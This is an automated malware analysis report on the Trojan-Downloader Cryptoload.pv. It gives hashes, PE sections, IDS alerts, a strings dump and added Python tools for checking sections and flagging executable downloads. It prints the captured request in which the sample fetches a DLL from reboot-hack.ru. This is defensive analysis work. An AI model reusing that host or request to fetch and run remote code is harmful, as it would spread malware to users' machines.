Trojan-Downloader.Win32.Cryptoload.pv_0ead47f1c2

by malwarelabrobot on February 7th, 2018 in Malware Descriptions.

Trojan-Downloader.Win32.Cryptoload.pv (Kaspersky), mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.



MD5: 0ead47f1c25287ef3b96e9bc56bebfdd
SHA1: f3781e9068a9c5d7a83c97493e6b01bd68909e00
SHA256: bd0a0c080e17116ef2e51c2847ec15af50d8e9e7e3b6168213908e42f911c22d
SSDeep: 12288:iWbNAxwFFWt3gbZcDFy K/uOTAsYTcz7hkB9cnVix3kLKv:iiIt3IZhYTK7h6U0
Size: 546304 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-11-18 17:18:38
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them. In this run the sample requested MmapApi.dll over plain HTTP from reboot-hack.ru (see Network Activity); no dropped PE files were recorded, so what the downloaded DLL does afterwards is not covered by this report.

Payload

No specific payload has been found.

Process activity

The Trojan-Downloader creates the following process(es):

%original file name%.exe:3708

The Trojan-Downloader injects its code into the following process(es):
No code injection was observed.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3708 makes changes to the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

Registry activity

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy   Section MD5
.text   4096             413073        413184    4.74634   1591a7ff0ec90d95e05ddaa709a61ae1
.rdata  417792           107192        107520    3.99733   6e34c51a8c9be5b8ef0459f79003aa87
.data   528384           7888          4096      2.21441   b5b3fe8311d5517b2e44a1d12bfb3b66
.gfids  536576           596           1024      1.82874   7dbbc025b10524f1739217c61056f93f
.tls    540672           9             512       0.014135  1f354d76203061bfdd5a53dae48d5435
.reloc  544768           18516         18944     4.62459   0070760c022f17d6e492a7e2d8342f17
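The six rows above are what a walk of the PE section table produces: the on-disk bytes of each section are hashed and measured, and the highest per-section entropy is what an "Entropy: Not Packed" verdict is based on. The following stdlib-only Python is an added example, not Lavasoft's tooling: it parses a PE32 section table into the same columns, applies the usual entropy threshold, and diffs a fresh parse against the table reproduced in REPORT_SECTIONS. build_fixture_pe constructs a minimal, non-loadable PE so the script runs without the sample; the 7.0 bits/byte threshold is a rule of thumb and not the analysis system's actual criterion.

```python
import hashlib
import math
import struct

# Section table as printed in this report (Virtual Address, Virtual Size, Raw Size,
# Entropy, Section MD5), kept here so a re-analysis of the sample can be diffed against it.
REPORT_SECTIONS = [
    {"name": ".text",  "virtual_address": 4096,   "virtual_size": 413073, "raw_size": 413184, "entropy": 4.74634,  "md5": "1591a7ff0ec90d95e05ddaa709a61ae1"},
    {"name": ".rdata", "virtual_address": 417792, "virtual_size": 107192, "raw_size": 107520, "entropy": 3.99733,  "md5": "6e34c51a8c9be5b8ef0459f79003aa87"},
    {"name": ".data",  "virtual_address": 528384, "virtual_size": 7888,   "raw_size": 4096,   "entropy": 2.21441,  "md5": "b5b3fe8311d5517b2e44a1d12bfb3b66"},
    {"name": ".gfids", "virtual_address": 536576, "virtual_size": 596,    "raw_size": 1024,   "entropy": 1.82874,  "md5": "7dbbc025b10524f1739217c61056f93f"},
    {"name": ".tls",   "virtual_address": 540672, "virtual_size": 9,      "raw_size": 512,    "entropy": 0.014135, "md5": "1f354d76203061bfdd5a53dae48d5435"},
    {"name": ".reloc", "virtual_address": 544768, "virtual_size": 18516,  "raw_size": 18944,  "entropy": 4.62459,  "md5": "0070760c022f17d6e492a7e2d8342f17"},
]

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0), the scale used in the table above."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> e_lfanew -> PE signature -> COFF header -> section headers and
    hash/measure each section's raw (on-disk) bytes, which is what the table reports."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)    # IMAGE_FILE_HEADER.NumberOfSections
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)       # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    table = coff + 20 + opt_size                                # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va,
            "virtual_size": vsize,
            "raw_size": raw_size,
            "entropy": round(shannon_entropy(raw), 5),
            "md5": hashlib.md5(raw).hexdigest(),
        })
    return sections

def packed_verdict(sections: list) -> str:
    """Rule of thumb (assumption, not the analysis system's criterion): a section whose raw
    bytes are near-random (> 7.0 bits/byte) usually holds compressed or encrypted code."""
    high = [s["name"] for s in sections if s["entropy"] > 7.0]
    return ("Likely packed or encrypted: " + ", ".join(high)) if high else "Not Packed"

def diff_against_report(found: list, expected: list) -> list:
    """Return human-readable mismatches between a fresh parse and a reference table."""
    by_name = {s["name"]: s for s in found}
    problems = []
    for exp in expected:
        got = by_name.get(exp["name"])
        if got is None:
            problems.append("missing section " + exp["name"])
            continue
        for key in ("virtual_address", "virtual_size", "raw_size", "md5"):
            if got[key] != exp[key]:
                problems.append("%s.%s: %r != %r" % (exp["name"], key, got[key], exp[key]))
        if abs(got["entropy"] - exp["entropy"]) > 1e-4:
            problems.append("%s.entropy: %r != %r" % (exp["name"], got["entropy"], exp["entropy"]))
    return problems

def build_fixture_pe(bodies: dict) -> bytes:
    """Constructed, non-loadable PE32 image with the given {name: bytes} sections, used only
    to exercise the parser offline. It is not the analysed sample."""
    opt_size, file_align, names = 0xE0, 0x200, list(bodies)
    first_raw = -(-(0x40 + 4 + 20 + opt_size + 40 * len(names)) // file_align) * file_align
    headers, data, raw_ptr, va = b"", b"", first_raw, 0x1000
    for name in names:
        body = bodies[name]
        raw_size = -(-len(body) // file_align) * file_align      # round up to FileAlignment
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(body), va,
                               raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        data += body.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += -(-len(body) // 0x1000) * 0x1000                   # next section on a page boundary
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)       # PE32 magic, rest zeroed
    image = dos + b"PE\0\0" + coff + opt + headers
    return image.ljust(first_raw, b"\0") + data

if __name__ == "__main__":
    fixture = build_fixture_pe({".text": bytes(range(256)) * 2, ".data": b"\xAA" * 256})
    for s in parse_sections(fixture):
        print(s)
    print(packed_verdict(parse_sections(fixture)), "|", packed_verdict(REPORT_SECTIONS))
```

Run it against the real sample with `parse_sections(open(path, "rb").read())` and pass the result to `diff_against_report(..., REPORT_SECTIONS)`: an empty list means the file on disk is the one this report describes, down to the per-section MD5s. Entropy is computed over SizeOfRawData bytes, including alignment padding, which is why the tiny .tls section (9 bytes of data in a 512-byte raw section) scores close to zero.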

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://reboot-hack.ru/api/storage/inject/MmapApi.dll?_v=205


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /api/storage/inject/MmapApi.dll?_v=. HTTP/1.1
Host: reboot-hack.ru
Accept: */*


HTTP/1.1 200 OK
Date: Tue, 06 Feb 2018 13:18:27 GMT
Server: Apache/2.4.27 (Win64) PHP/5.6.31
Last-Modified: Tue, 06 Feb 2018 13:18:00 GMT
ETag: "42e00-5648b020268fe"
Accept-Ranges: bytes
Content-Length: 273920
Content-Type: application/x-msdownload
[binary response body; the recoverable structure is an MZ DOS header with the stub message "This program cannot be run in DOS mode", a "Rich" header, the "PE\0\0" signature (the "L" that follows it is the low byte of the i386 machine type 0x014C) and a section table naming .text, .rdata, .data, .gfids, .tls and .reloc]

<<< skipped >>>
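The two Suricata alerts above fire on the response, not on the URL: one on the MZ/PE magic in the body, the other on a VMProtect signature inside it. The following Python is an added example, not part of this report, that pairs the request with its response and lists the reasons a NIDS would flag the transfer: an executable Content-Type, an MZ/PE header in the body (with the COFF Characteristics telling a DLL from an EXE, consistent with the requested .dll), an executable extension in the path, and a body shorter than the declared Content-Length. build_sample_exchange is constructed from the request line and response headers shown above with a synthetic PE32 DLL stub in place of the real MmapApi.dll, so its Content-Length is the stub's; the VMProtect signature check is not reproduced.

```python
import struct
from typing import Optional

IMAGE_FILE_DLL = 0x2000
# MIME types a server uses when it admits it is serving a Windows executable.
EXECUTABLE_CONTENT_TYPES = {"application/x-msdownload", "application/x-msdos-program",
                            "application/vnd.microsoft.portable-executable"}

def split_http_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, lower-cased header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP response head")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body

def pe_info(body: bytes) -> Optional[dict]:
    """Return machine type and DLL flag if the body starts with a well-formed MZ/PE header,
    else None. This body check is what a 'PE EXE or DLL download' rule relies on; it does
    not depend on whatever Content-Type the server chose to send."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)
    if e_lfanew + 24 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (machine,) = struct.unpack_from("<H", body, e_lfanew + 4)          # IMAGE_FILE_HEADER.Machine
    (characteristics,) = struct.unpack_from("<H", body, e_lfanew + 22)  # IMAGE_FILE_HEADER.Characteristics
    return {"machine": machine, "is_dll": bool(characteristics & IMAGE_FILE_DLL)}

def inspect_transfer(request: bytes, response: bytes) -> dict:
    """Pair a request with its response and list why a NIDS would flag the transfer."""
    req_lines = request.split(b"\r\n")
    method, target, _ = req_lines[0].decode("latin-1").split(" ", 2)
    host = next((l.split(b":", 1)[1].strip().decode("latin-1")
                 for l in req_lines[1:] if l.lower().startswith(b"host:")), "")
    status, headers, body = split_http_response(response)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    info = pe_info(body)
    findings = []
    if ctype in EXECUTABLE_CONTENT_TYPES:
        findings.append("executable content-type")
    if info is not None:
        findings.append("PE DLL in body" if info["is_dll"] else "PE EXE in body")
        if ctype not in EXECUTABLE_CONTENT_TYPES:
            findings.append("content-type does not declare an executable")
    if target.split("?", 1)[0].lower().endswith((".exe", ".dll")):
        findings.append("executable extension in URL path")
    declared = headers.get("content-length")
    if declared is not None and int(declared) != len(body):
        findings.append("body length differs from Content-Length")
    return {"method": method, "host": host, "target": target, "status": status,
            "pe": info, "findings": findings}

def build_sample_exchange():
    """Constructed request/response modelled on the capture above. Only the request line,
    Host and the response headers mirror the report; the body is a synthetic PE32 DLL stub
    (MZ header, e_lfanew, PE signature, COFF header with IMAGE_FILE_DLL set), not the real
    MmapApi.dll, and Content-Length is therefore the stub's length."""
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)
    body = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0" + coff + b"\0" * 0xE0
    request = (b"GET /api/storage/inject/MmapApi.dll?_v=205 HTTP/1.1\r\n"
               b"Host: reboot-hack.ru\r\nAccept: */*\r\n\r\n")
    response = (b"HTTP/1.1 200 OK\r\nServer: Apache/2.4.27 (Win64) PHP/5.6.31\r\n"
                b"Content-Type: application/x-msdownload\r\n"
                b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)
    return request, response

if __name__ == "__main__":
    req, resp = build_sample_exchange()
    print(inspect_transfer(req, resp))
```

The body check is deliberately independent of the Content-Type: a server that relabels the DLL as image/jpeg still produces the "PE DLL in body" finding, which is the case the ET POLICY rule is written for, and the Content-Length comparison catches a capture that was cut off before the download finished.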

The Trojan-Downloader connects to the servers at the following location(s):

Strings from dumps

%original file name%.exe_3708:

.text
`.rdata
@.data
.gfids
@.tls
.reloc
.JGK`
-n}Kl
.wl!_
88888888888888888
88 8!"#8888
>%u[j
9opu39_tu.Pj
t(<.ut
t.Uh(
D$,<%uf
D$@PSSh
SSSSSh\d
j.Yf;
_tcPVj@
.PjRW
Bv.SCv
-2w}s2w
inappropriate io control operation
not supported
operation canceled
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
address family not supported
broken pipe
function not supported
InitOnceExecuteOnce
Connection #%ld to host %s left intact
Pipe broke: handle %p, url = %s
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received
Operation timed out after %ld milliseconds with %I64d bytes received
Hostname '%s' was found in DNS cache
Internal error removing splay node = %d
Internal error clearing splay node = %d
ignoring failed cookie_init for %s
23[^;
=] =I99[^;
httponly
skipped cookie with bad tailmatch domain: %s
#HttpOnly_
%s cookie %s="%s" for domain %s, path %s, expire %I64d
%s%s%s
# Netscape HTTP Cookie File
# hXXps://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
security.dll
secur32.dll
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
%s:%d
Hostname %s was found in DNS cache
%5[^:]:%d
Couldn't parse CURLOPT_RESOLVE removal entry '%s'!
%5[^:]:%d:%5s
Couldn't parse CURLOPT_RESOLVE entry '%s'!
Address in '%s' found illegal!
Added %s:%d:%s to DNS cache
Unrecognized parameter value passed via CURLOPT_SSLVERSION
CURL_SSLVERSION_MAX incompatible with CURL_SSLVERSION
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
can pipeline
Found bundle for host %s: %p [%s]
Server doesn't support multi-use yet, wait
Server doesn't support multi-use (yet)
Could pipeline, but not asked to!
Pipe is full, skip (%zu)
Multiplexed connection found!
Found pending candidate for reuse and CURLOPT_PIPEWAIT is set
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode domains
Protocol "%s" not supported or disabled in libcurl
Illegal characters found in URL
Bad URL, colon is first character
Bad URL
127.0.0.1/
Invalid file://hostname/, expected localhost or 127.0.0.1 or none
/:]:%3[/]%[^
<url> malformed
SMTP.
smtp
Unwillingly accepted illegal URL using %d slash%s!
%s://%s%s
Rebuilt URL to: %s
Please URL encode %% as %%, see RFC 6874.
http_proxy
https
http:
Unsupported proxy scheme for '%s'
Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.
No valid port number in proxy string (%s)
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number out of range
Port number ended with '%c'
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
No valid port number in connect to host string (%s)
Connecting to hostname: %s
Connecting to port: %d
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
%s://%s
Found connection %ld, with requests in the pipe (%zu)
Re-using existing connection! (#%ld) with %s %s
No more connections allowed to host: %d
User-Agent: %s
Send failure: %s
Recv failure: %s
Write callback asked for PAUSE when not supported!
[%s %s %s]
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Immediate connect fail for %s: %s
ftps
smtps
tftp
7.54.0
libcurl/7.54.0
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Simulate a HTTP 304 response!
%s in chunked-encoding
Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d
No URL set!
%%x
[^?&/:]://%c
Issue another request to this URL: '%s'
Disables POST, goes with %s
HTTPS
%s:%s
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP/
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %s
Connection closure while negotiating auth (HTTP 1.0?)
HTTP error before end of send, keep sending
HTTP error before end of send, stop sending
HTTP/%d.%d %d
HTTP/2 %d
Lying server, not serving HTTP/2
HTTP =
RTSP/%d.%d =
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
%ld%s
--:--:--
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s
Site %s:%d is pipeline blacklisted
Server %s is blacklisted
d:d:d%n
d:d%n
0123456789
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
Error in the HTTP2 framing layer
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
SSL public key does not match pinned public key
SSL server certificate status verification FAILED
Stream error in the HTTP/2 framing layer
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
SEC_E_CERT_EXPIRED
SEC_E_CERT_UNKNOWN
SEC_E_CERT_WRONG_USAGE
SEC_E_KDC_CERT_EXPIRED
SEC_E_KDC_CERT_REVOKED
SEC_E_NO_KERB_KEY
SEC_E_NO_S4U_PROT_SUPPORT
SEC_E_QOP_NOT_SUPPORTED
SEC_E_SMARTCARD_CERT_EXPIRED
SEC_E_SMARTCARD_CERT_REVOKED
SEC_E_STRONG_CRYPTO_NOT_SUPPORTED
SEC_E_UNSUPPORTED_FUNCTION
SEC_E_UNSUPPORTED_PREAUTH
SEC_E_ILLEGAL_MESSAGE (0xX) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.
%s (0xX)
%s - %s
%d.%d.%d.%d
Schannel: TLS 1.3 is not yet supported
schannel: SSL/TLS connection with %s port %hu (step 1/3)
schannel: incremented credential handle refcount = %d
schannel: disabled server certificate revocation checks
schannel: checking server certificate revocation
schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates.
Unrecognized parameter passed via CURLOPT_SSLVERSION
schannel: SNI or certificate check failed: %s
schannel: AcquireCredentialsHandle failed: %s
schannel: using IP address, SNI is not supported by OS.
http/1.1
schannel: ALPN, offering %s
schannel: initial InitializeSecurityContext failed: %s
schannel: SSL/TLS connection with %s port %hu (step 2/3)
schannel: a client certificate has been requested
schannel: next InitializeSecurityContext failed: %s
schannel: SSL/TLS connection with %s port %hu (step 3/3)
schannel: failed to retrieve remote cert context
select/poll on SSL/TLS socket, errno: %d
select/poll on SSL socket, errno: %d
schannel: Curl_read_plain returned CURLE_AGAIN
schannel: Curl_read_plain returned CURLE_RECV_ERROR
schannel: Curl_read_plain returned error %d
schannel: failed to read data from server: %s
schannel: shutting down SSL/TLS connection with %s port %hu
schannel: ApplyControlToken failure: %s
schannel: failed to send close msg: %s (bytes written: %zd)
%c%c==
%c%c%c=
%c%c%c%c
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s%s%s
Unable to read the CSeq header: [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
curl
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
No known authentication mechanisms supported!
LIST "%s" *
SELECT %s
FETCH %s BODY[%s]<%s>
FETCH %s BODY[%s]
APPEND %s (\Seen) {%I64d}
SEARCH %s
LOGINDISABLED
STARTTLS not supported.
Access denied. %c
%cd
%s %s
USER %s
APOP %s %s
AUTH %s %s
AUTH %s
STLS not supported.
Authentication failed: %d
PASS %s
SMTP
SMTPS
EHLO %s
HELO %s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:<%s>
Got unexpected smtp-server response: %d
STARTTLS denied, code %d
Remote access denied: %d
Command failed: %d
MAIL failed: %d
RCPT failed: %d
DATA failed: %d
PORT
FTPS
Preparing for accepting server on data port
FTP response timeout
FTP response aborted due to select/poll error: %d
CWD %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
Failure sending PORT command: %s
Connect data stream passively
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
SIZE %s
MDTM %s
APPE %s
STOR %s
RETR %s
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skip %d.%d.%d.%d for data connection, re-use %s instead
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
dddddd
ddd d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
Failed FTP upload: 
RETR response: d
PBSZ %d
ACCT %s
Access denied: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
PRET command not accepted: d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
TYPE %c
Connecting to %s (%s) port %d
ftp_perform ends with SECONDARY: %d
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Uploading to a URL without a file name!
CLIENT libcurl 7.54.0
MATCH %s %s %s
DEFINE %s %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
%c%c%c%c%s%c%c
7[^,],7s
%c%s%c%s
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
tftp_send_first: internal error
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
TFTP finished
bind() failed; %s
TFTP response timeout
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
login
password
%sAuthorization: Digest %s
%sAuthorization: NTLM %s
SOCKS4%s: connecting to HTTP proxy %s port %d
SOCKS4 communication to %s:%d
SOCKS4 connect to IPv4 %s (locally resolved)
SOCKS4 connection to %s not supported
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
SOCKS5: connecting to HTTP proxy %s port %d
SOCKS5 communication to %s:%d
User was rejected by the SOCKS5 server (%d %d).
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
SOCKS5 connect to IPv4 %s (locally resolved)
SOCKS5 connection to %s not supported
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
Ignoring Content-Length in CONNECT d response
Ignoring Transfer-Encoding in CONNECT d response
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
.jpeg
.html
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
------------------------xx
NTLM handshake failure (type-3 message): Status=%x
InitializeSecurityContext failed: %s
%sAuthorization: Negotiate %s
2.5.4.3
2.5.29.17
1.2.840.10040.4.1
1.2.840.10040.4.3
1.2.840.10045.2.1
ecPublicKey
1.2.840.10045.3.0.1
1.2.840.10045.4.1
1.2.840.10046.2.1
1.2.840.113549.1.1.1
1.2.840.113549.1.1.2
1.2.840.113549.1.1.4
1.2.840.113549.1.1.5
1.2.840.113549.1.1.10
1.2.840.113549.1.1.14
1.2.840.113549.1.1.11
1.2.840.113549.1.1.12
1.2.840.113549.1.1.13
1.2.840.113549.2.2
1.2.840.113549.2.5
1.3.14.3.2.26
2.5.4.4
2.5.4.5
2.5.4.6
2.5.4.7
2.5.4.8
2.5.4.9
2.5.4.10
2.5.4.11
2.5.4.12
2.5.4.13
2.5.4.17
2.5.4.41
2.5.4.42
2.5.4.43
2.5.4.44
2.5.4.45
2.5.4.46
2.5.4.65
1.2.840.113549.1.9.1
2.5.4.72
2.5.29.18
2.5.29.19
2.16.840.1.101.3.4.2.4
2.16.840.1.101.3.4.2.1
2.16.840.1.101.3.4.2.2
2.16.840.1.101.3.4.2.3
x:
%s%lx
%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s
%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s
%s: %s
RSA Public Key (%lu bits)
RSA Public Key
dsa(pub_key)
dh(pub_key)
- Subject: %s
Issuer: %s
Serial Number: %s
Signature Algorithm: %s
Start Date: %s
Expire Date: %s
